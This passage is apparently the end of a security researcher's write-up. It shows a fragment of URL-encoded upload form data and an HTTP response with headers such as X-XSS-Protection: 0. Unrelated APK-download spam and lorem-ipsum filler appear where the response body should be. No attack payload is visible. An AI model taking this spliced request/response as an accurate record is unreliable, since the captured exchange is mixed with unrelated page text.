0_status&data%5B10%5D%5Bvalue%5D=done&data%5B11%5D%5Bname%5D=uploader_count&data%5B11%5D%5Bvalue%5D=1

RESPONSE

================

Date: Wed, 14 Dec 2016 17:32:31 GMT

Content-Type: text/html

Connection: keep-alive

Content-Security-Policy: style-src ‘unsafe-inline’ https:;

X-Content-Type-Options: nosniff

X-XSS-Protection: 0

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

x-frame-options: sameorigin

Strict-Transport-Security: max-age=31536000; includeSubDomains

Content-Length: 64

Did you find apk for android? You can find new Free Android Games and apps.
Share it!
Aenean mattis venenatis

Related Articles

Leave a Reply

Your email address will not be published. Required fields are marked *

Lawrence Amer | CPTE , CEH